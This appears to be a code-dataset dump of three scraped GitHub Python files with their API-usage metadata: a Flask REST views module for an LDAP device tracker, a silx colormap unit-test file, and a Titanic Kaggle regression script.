"api_name": "flask_restx.fields",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Url",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.URL",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Url",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 71,
"usage_type": "name"
},
{
"api_name": "typing.Type",
"line_number": 75,
"usage_type": "attribute"
},
{
"api_name": "model.base_model.Model",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Boolean",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "marshmallow.fields",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Float",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "marshmallow.fields",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "model.base_model",
"line_number": 81,
"usage_type": "name"
}
] |
7169499809
|
from flask import Blueprint, request, jsonify, abort
from modules.logger import logging
from modules.config import config
import modules.database as Database
import modules.models as Models
import modules.ldap as Ldap
import modules.scanner as Scanner
from modules.tools import get_token,requires_auth,check_auth,calc_hash,no_object_found
views = Blueprint('views', __name__)
@views.route("/login", methods=['GET','POST'])
def login():
"""If Post, Login User. If Get, check if user is authorized"""
if request.method == 'POST':
username = request.headers.get('username')
password = request.headers.get('password')
if Database.check_user(username, calc_hash(password)):
return jsonify({'token': get_token(username)})
else:
return jsonify({'error':'Incorrect Login'}), 401
else:
auth = request.headers.get('Authorization')
if not auth:
return jsonify({'error': 'Auth Token Required'}), 210
elif check_auth(auth):
return jsonify({'message': 'Success'}), 200
else:
return jsonify({'error': 'Auth Token Incorrect'}), 210
@views.route("/users", methods=['GET', 'POST','DELETE'])
@requires_auth
def users():
"""Get, Post and Delete Users"""
if request.method == 'POST':
username = request.headers.get('username')
password = request.headers.get('password')
if username == "admin":
return jsonify({'error': 'Can not modify admin'}), 404
elif username and password:
return jsonify(
Database.update_user(
Models.User(
username=username,
password=calc_hash(password))))
else:
return jsonify({'error': 'Headers not provided'}), 404
elif request.method == 'DELETE':
username = request.headers.get('username')
if username == "admin":
return jsonify({'error': 'Can not modify admin'}), 404
elif username:
return jsonify(
Database.delete_user(
Models.User(
username=username)))
else:
return jsonify({'error': 'Headers not provided'}), 404
else:
users = []
[users.append(u.username) for u in Database.get_users() if u.username != "admin"]
return jsonify(users)
@views.route("/devices")
def devices():
"""Get Devices"""
return jsonify(Models.Devices().get_devices_dict())
@views.route("/device/<id>", methods=['GET', 'POST','DELETE'])
@requires_auth
def device(id):
"""Get, Post and Delete a Device"""
device = Models.Device(id=id)
if request.method == 'POST':
device.scan()
device.sync_ldap()
device.update()
return jsonify(device.to_dict())
device.get()
if request.method == 'DELETE':
return jsonify(device.delete()) if device else no_object_found()
else:
return jsonify(device.to_dict()) if device else no_object_found()
@views.route("/locations")
def locations():
"""Get Locations"""
return jsonify(Models.Devices().get_locations())
@views.route("/scan")
def scans():
devices = Models.Devices()
devices.get_devices()
devices.sync_ldap()
devices.scan()
devices.update_devices()
return jsonify(devices.get_devices_dict())
@views.route("/scan/<id>")
def scan(id):
device = Models.Device(id=id)
if device.get() == None:
return no_object_found()
else:
device.sync_ldap()
device.scan()
device.update()
return jsonify(device.to_dict())
@views.route("/history")
def history():
history = Models.Devices().get_history_dict()
return jsonify(history)
@views.route("/history/<id>")
def device_history(id):
history = Models.Device(id=id).get_history_dict()
if history:
return jsonify(history) if history else no_object_found()
else:
return no_object_found()
|
aDrongo/ldap-device-surveyor
|
backend/modules/views.py
|
views.py
|
py
| 4,004 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Blueprint",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "modules.database.check_user",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "modules.tools.calc_hash",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "modules.tools.get_token",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "flask.request.headers.get",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "modules.tools.check_auth",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 38,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "modules.database.update_user",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "modules.models.User",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "modules.tools.calc_hash",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "modules.database.delete_user",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "modules.models.User",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 57,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "modules.database.get_users",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "modules.tools.requires_auth",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "modules.models.Devices",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "modules.models.Device",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "flask.request.method",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 76,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 82,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "modules.tools.requires_auth",
"line_number": 72,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "modules.models.Devices",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 90,
"usage_type": "name"
},
{
"api_name": "modules.models.Devices",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 94,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "modules.models.Device",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 103,
"usage_type": "name"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "modules.models.Devices",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 114,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "modules.models.Device",
"line_number": 119,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 119,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 123,
"usage_type": "call"
}
] |
26113994325
|
__authors__ = ["T. Vincent"]
__license__ = "MIT"
__date__ = "16/05/2018"
import logging
import sys
import numpy
import pytest
from silx.utils.testutils import ParametricTestCase
from silx.math import colormap
_logger = logging.getLogger(__name__)
class TestNormalization(ParametricTestCase):
"""Test silx.math.colormap.Normalization sub classes"""
def _testCodec(self, normalization, rtol=1e-5):
"""Test apply/revert for normalizations"""
test_data = (numpy.arange(1, 10, dtype=numpy.int32),
numpy.linspace(1., 100., 1000, dtype=numpy.float32),
numpy.linspace(-1., 1., 100, dtype=numpy.float32),
1.,
1)
for index in range(len(test_data)):
with self.subTest(normalization=normalization, data_index=index):
data = test_data[index]
normalized = normalization.apply(data, 1., 100.)
result = normalization.revert(normalized, 1., 100.)
self.assertTrue(numpy.array_equal(
numpy.isnan(normalized), numpy.isnan(result)))
if isinstance(data, numpy.ndarray):
notNaN = numpy.logical_not(numpy.isnan(result))
data = data[notNaN]
result = result[notNaN]
self.assertTrue(numpy.allclose(data, result, rtol=rtol))
def testLinearNormalization(self):
"""Test for LinearNormalization"""
normalization = colormap.LinearNormalization()
self._testCodec(normalization)
def testLogarithmicNormalization(self):
"""Test for LogarithmicNormalization"""
normalization = colormap.LogarithmicNormalization()
# relative tolerance is higher because of the log approximation
self._testCodec(normalization, rtol=1e-3)
# Specific extra tests
self.assertTrue(numpy.isnan(normalization.apply(-1., 1., 100.)))
self.assertTrue(numpy.isnan(normalization.apply(numpy.nan, 1., 100.)))
self.assertEqual(normalization.apply(numpy.inf, 1., 100.), numpy.inf)
self.assertEqual(normalization.apply(0, 1., 100.), - numpy.inf)
def testArcsinhNormalization(self):
"""Test for ArcsinhNormalization"""
self._testCodec(colormap.ArcsinhNormalization())
def testSqrtNormalization(self):
"""Test for SqrtNormalization"""
normalization = colormap.SqrtNormalization()
self._testCodec(normalization)
# Specific extra tests
self.assertTrue(numpy.isnan(normalization.apply(-1., 0., 100.)))
self.assertTrue(numpy.isnan(normalization.apply(numpy.nan, 0., 100.)))
self.assertEqual(normalization.apply(numpy.inf, 0., 100.), numpy.inf)
self.assertEqual(normalization.apply(0, 0., 100.), 0.)
class TestColormap(ParametricTestCase):
"""Test silx.math.colormap.cmap"""
NORMALIZATIONS = (
'linear',
'log',
'arcsinh',
'sqrt',
colormap.LinearNormalization(),
colormap.LogarithmicNormalization(),
colormap.GammaNormalization(2.),
colormap.GammaNormalization(0.5))
@staticmethod
def ref_colormap(data, colors, vmin, vmax, normalization, nan_color):
"""Reference implementation of colormap
:param numpy.ndarray data: Data to convert
:param numpy.ndarray colors: Color look-up-table
:param float vmin: Lower bound of the colormap range
:param float vmax: Upper bound of the colormap range
:param str normalization: Normalization to use
:param Union[numpy.ndarray, None] nan_color: Color to use for NaN
"""
norm_functions = {'linear': lambda v: v,
'log': numpy.log10,
'arcsinh': numpy.arcsinh,
'sqrt': numpy.sqrt}
if isinstance(normalization, str):
norm_function = norm_functions[normalization]
else:
def norm_function(value):
return normalization.apply(value, vmin, vmax)
with numpy.errstate(divide='ignore', invalid='ignore'):
# Ignore divide by zero and invalid value encountered in log10, sqrt
norm_data, vmin, vmax = map(norm_function, (data, vmin, vmax))
if normalization == 'arcsinh' and sys.platform == 'win32':
# There is a difference of behavior of numpy.arcsinh
# between Windows and other OS for results of infinite values
# This makes Windows behaves as Linux and MacOS
norm_data[data == numpy.inf] = numpy.inf
norm_data[data == -numpy.inf] = -numpy.inf
nb_colors = len(colors)
scale = nb_colors / (vmax - vmin)
# Substraction must be done in float to avoid overflow with uint
indices = numpy.clip(scale * (norm_data - float(vmin)),
0, nb_colors - 1)
indices[numpy.isnan(indices)] = nb_colors # Use an extra index for NaN
indices = indices.astype('uint')
# Add NaN color to array
if nan_color is None:
nan_color = (0,) * colors.shape[-1]
colors = numpy.append(colors, numpy.atleast_2d(nan_color), axis=0)
return colors[indices]
def _test(self, data, colors, vmin, vmax, normalization, nan_color):
"""Run test of colormap against alternative implementation
:param numpy.ndarray data: Data to convert
:param numpy.ndarray colors: Color look-up-table
:param float vmin: Lower bound of the colormap range
:param float vmax: Upper bound of the colormap range
:param str normalization: Normalization to use
:param Union[numpy.ndarray, None] nan_color: Color to use for NaN
"""
image = colormap.cmap(
data, colors, vmin, vmax, normalization, nan_color)
ref_image = self.ref_colormap(
data, colors, vmin, vmax, normalization, nan_color)
self.assertTrue(numpy.allclose(ref_image, image))
self.assertEqual(image.dtype, colors.dtype)
self.assertEqual(image.shape, data.shape + (colors.shape[-1],))
def test(self):
"""Test all dtypes with finite data
Test all supported types and endianness
"""
colors = numpy.zeros((256, 4), dtype=numpy.uint8)
colors[:, 0] = numpy.arange(len(colors))
colors[:, 3] = 255
# Generates (u)int and floats types
dtypes = [e + k + i for e in '<>' for k in 'uif' for i in '1248'
if k != 'f' or i != '1']
dtypes.append(numpy.dtype(numpy.longdouble).name) # Add long double
for normalization in self.NORMALIZATIONS:
for dtype in dtypes:
with self.subTest(dtype=dtype, normalization=normalization):
_logger.info('normalization: %s, dtype: %s',
normalization, dtype)
data = numpy.arange(-5, 15).astype(dtype).reshape(4, 5)
self._test(data, colors, 1, 10, normalization, None)
def test_not_finite(self):
"""Test float data with not finite values"""
colors = numpy.zeros((256, 4), dtype=numpy.uint8)
colors[:, 0] = numpy.arange(len(colors))
colors[:, 3] = 255
test_data = { # message: data
'no finite values': (float('inf'), float('-inf'), float('nan')),
'only NaN': (float('nan'), float('nan'), float('nan')),
'mix finite/not finite': (float('inf'), float('-inf'), 1., float('nan')),
}
for normalization in self.NORMALIZATIONS:
for msg, data in test_data.items():
with self.subTest(msg, normalization=normalization):
_logger.info('normalization: %s, %s', normalization, msg)
data = numpy.array(data, dtype=numpy.float64)
self._test(data, colors, 1, 10, normalization, (0, 0, 0, 0))
def test_errors(self):
"""Test raising exception for bad vmin, vmax, normalization parameters
"""
colors = numpy.zeros((256, 4), dtype=numpy.uint8)
colors[:, 0] = numpy.arange(len(colors))
colors[:, 3] = 255
data = numpy.arange(10, dtype=numpy.float64)
test_params = [ # (vmin, vmax, normalization)
(-1., 2., 'log'),
(0., 1., 'log'),
(1., 0., 'log'),
(-1., 1., 'sqrt'),
(1., -1., 'sqrt'),
]
for vmin, vmax, normalization in test_params:
with self.subTest(
vmin=vmin, vmax=vmax, normalization=normalization):
_logger.info('normalization: %s, range: [%f, %f]',
normalization, vmin, vmax)
with self.assertRaises(ValueError):
self._test(data, colors, vmin, vmax, normalization, None)
def test_apply_colormap():
"""Basic test of silx.math.colormap.apply_colormap"""
data = numpy.arange(256)
expected_colors = numpy.empty((256, 4), dtype=numpy.uint8)
expected_colors[:, :3] = numpy.arange(256, dtype=numpy.uint8).reshape(256, 1)
expected_colors[:, 3] = 255
colors = colormap.apply_colormap(
data,
colormap="gray",
norm="linear",
autoscale="minmax",
vmin=None,
vmax=None,
gamma=1.0)
assert numpy.array_equal(colors, expected_colors)
testdata_normalize = [
(numpy.arange(512), numpy.arange(512) // 2, 0, 511),
((numpy.nan, numpy.inf, -numpy.inf), (0, 255, 0), 0, 1),
((numpy.nan, numpy.inf, -numpy.inf, 1), (0, 255, 0, 0), 1, 1),
]
@pytest.mark.parametrize(
"data,expected_data,expected_vmin,expected_vmax",
testdata_normalize,
)
def test_normalize(data, expected_data, expected_vmin, expected_vmax):
"""Basic test of silx.math.colormap.normalize"""
result = colormap.normalize(
numpy.asarray(data),
norm="linear",
autoscale="minmax",
vmin=None,
vmax=None,
gamma=1.0,
)
assert result.vmin == expected_vmin
assert result.vmax == expected_vmax
assert numpy.array_equal(
result.data,
numpy.asarray(expected_data, dtype=numpy.uint8),
)
|
silx-kit/silx
|
src/silx/math/test/test_colormap.py
|
test_colormap.py
|
py
| 10,291 |
python
|
en
|
code
| 106 |
github-code
|
6
|
[
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "silx.utils.testutils.ParametricTestCase",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.int32",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "numpy.linspace",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "numpy.linspace",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "numpy.array_equal",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.ndarray",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "numpy.logical_not",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.allclose",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap.LinearNormalization",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.LogarithmicNormalization",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "numpy.isnan",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "silx.math.colormap.ArcsinhNormalization",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.SqrtNormalization",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "numpy.isnan",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 74,
"usage_type": "attribute"
},
{
"api_name": "silx.utils.testutils.ParametricTestCase",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.LinearNormalization",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 86,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.LogarithmicNormalization",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 87,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.GammaNormalization",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 88,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.GammaNormalization",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "numpy.log10",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "numpy.arcsinh",
"line_number": 104,
"usage_type": "attribute"
},
{
"api_name": "numpy.sqrt",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "numpy.errstate",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "sys.platform",
"line_number": 117,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 121,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 122,
"usage_type": "attribute"
},
{
"api_name": "numpy.clip",
"line_number": 128,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "numpy.append",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "numpy.atleast_2d",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap.cmap",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 150,
"usage_type": "name"
},
{
"api_name": "numpy.allclose",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 165,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 166,
"usage_type": "call"
},
{
"api_name": "numpy.dtype",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "numpy.longdouble",
"line_number": 172,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 185,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 186,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "numpy.float64",
"line_number": 199,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 205,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 205,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 206,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 209,
"usage_type": "call"
},
{
"api_name": "numpy.float64",
"line_number": 209,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 230,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 231,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 231,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 232,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 232,
"usage_type": "attribute"
},
{
"api_name": "silx.math.colormap.apply_colormap",
"line_number": 234,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 234,
"usage_type": "name"
},
{
"api_name": "numpy.array_equal",
"line_number": 242,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 246,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 247,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 247,
"usage_type": "attribute"
},
{
"api_name": "numpy.nan",
"line_number": 248,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 248,
"usage_type": "attribute"
},
{
"api_name": "silx.math.colormap.normalize",
"line_number": 257,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 257,
"usage_type": "name"
},
{
"api_name": "numpy.asarray",
"line_number": 258,
"usage_type": "call"
},
{
"api_name": "numpy.array_equal",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 269,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 269,
"usage_type": "attribute"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 251,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 251,
"usage_type": "attribute"
}
] |
71150367547
|
import numpy as np
import pandas as pd
import scipy
from sklearn.linear_model import LinearRegression as linreg
from sklearn.linear_model import LogisticRegression as logreg
from sklearn.cross_validation import KFold
from sklearn.cross_validation import *
from sklearn import cross_validation
titanic=pd.read_csv("train.csv")
#print(titanic.describe())
#print(titanic.head(5))
# ------------------- DATA CORRECTION --------------------------------
# 1) Fill missing Age data with median
titanic["Age"]=titanic["Age"].fillna(titanic["Age"].median())
# 2) Convert Sex string with 0 or 1
titanic.loc[titanic["Sex"] == "male", "Sex"] = 0 #convert 0 for men
titanic.loc[titanic["Sex"] =="female", "Sex"]=1 #convert 1 for women
# 3) Fill missing Embarked data with most common char
print(pd.value_counts(titanic["Embarked"].values, sort=False))
# "S" is most common char -> chosen as default for missing values
titanic["Embarked"]=titanic["Embarked"].fillna("S")
#4) Replace Embarked char with numeric code
#titanic.loc[titanic["Embarked"]=="S", "Embarked"]=0 # 'S' -> 0
#titanic.loc[titanic["Embarked"]=="C", "Embarked"]=1 # 'C' -> 1
titanic.loc[titanic["Embarked"]=="S", "Embarked"]=0
titanic.loc[titanic["Embarked"]=="C", "Embarked"]=1
titanic.loc[titanic["Embarked"]=="Q", "Embarked"]=2 # 'Q' -> 2
# input column used for predictions :
predictors=["Pclass", "Sex", "Age", "SibSp", "Parch", "Fare", "Embarked"]
# Initialize the algorithm
algo_linreg = linreg()
# Generate cross-validation folds with random splits
# return rows indices for corresponding train and set
kf =KFold(titanic.shape[0], n_folds=3, random_state=1)
# Make the predictions
predictions =[]
for train, test in kf:
# Which predictors used on train fold
train_predictors = (titanic[predictors].iloc[train,:])
# Target/goal used to train the algo
train_target= titanic["Survived"].iloc[train]
# Train the algo with the predictors and target
# .fit(x input, y output)
algo_linreg.fit(train_predictors, train_target)
# Make predictions with the trained algo on test fold
test_predictions = algo_linreg.predict(titanic[predictors].iloc[test,:])
predictions.append(test_predictions)
# The predictions are in 3 Numpy arrays
# So we concatenate the arrays on axis 0 (bc only 1 axis)
predictions=np.concatenate(predictions, axis=0)
predictions[predictions> .5]=1
predictions[predictions<= .5]=0
print(predictions)
print(sum(predictions==titanic["Survived"]))
accuracy= sum(predictions==titanic["Survived"])/len(predictions)
print(accuracy) # = 0.783
#------------------- Logistic Regression method ---------------------
# Initialize the algo
algo_logreg = logreg(random_state=1)
# Compute accuracy score for all cross-V folds;
# cross_val_score(algo, predictors, target, cross-validation fold)
scores = cross_validation.cross_val_score(algo_logreg, titanic[predictors], titanic["Survived"], cv=3)
# Mean of the scores for each folds (3 folds)
print(scores.mean())
#----------------------------------- Log Reg. with test set ---------------------
titanic_test = pd.read_csv("test.csv")
# I) Clean data
titanic_test["Age"] = titanic_test["Age"].fillna(titanic["Age"].median())
titanic_test["Fare"] = titanic_test["Fare"].fillna(titanic_test["Fare"].median())
titanic_test.loc[titanic_test["Sex"] == "male", "Sex"] = 0
titanic_test.loc[titanic_test["Sex"] == "female", "Sex"] = 1
titanic_test["Embarked"] = titanic_test["Embarked"].fillna("S")
titanic_test.loc[titanic_test["Embarked"] == "S", "Embarked"] = 0
titanic_test.loc[titanic_test["Embarked"] == "C", "Embarked"] = 1
titanic_test.loc[titanic_test["Embarked"] == "Q", "Embarked"] = 2
# II) Test algo on data
# Initialize the algo
algo_logreg_test=logreg(random_state=1)
# Train algo on using all training data
algo_logreg_test.fit(titanic[predictors], titanic["Survived"])
# Make predictions with algo on data
predictions=algo_logreg_test.predict(titanic_test[predictors])
# Generate new dataset for kaggle submission
submission= pd.DataFrame({
"PassengerId" : titanic_test["PassengerId"],
"Survived": predictions
})
submission.to_csv("kaggle.csv", index=False)
|
leminhtr/kaggle
|
Titanic/main_linreg-logreg.py
|
main_linreg-logreg.py
|
py
| 4,162 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pandas.value_counts",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LinearRegression",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "sklearn.cross_validation.KFold",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LogisticRegression",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "sklearn.cross_validation.cross_val_score",
"line_number": 83,
"usage_type": "call"
},
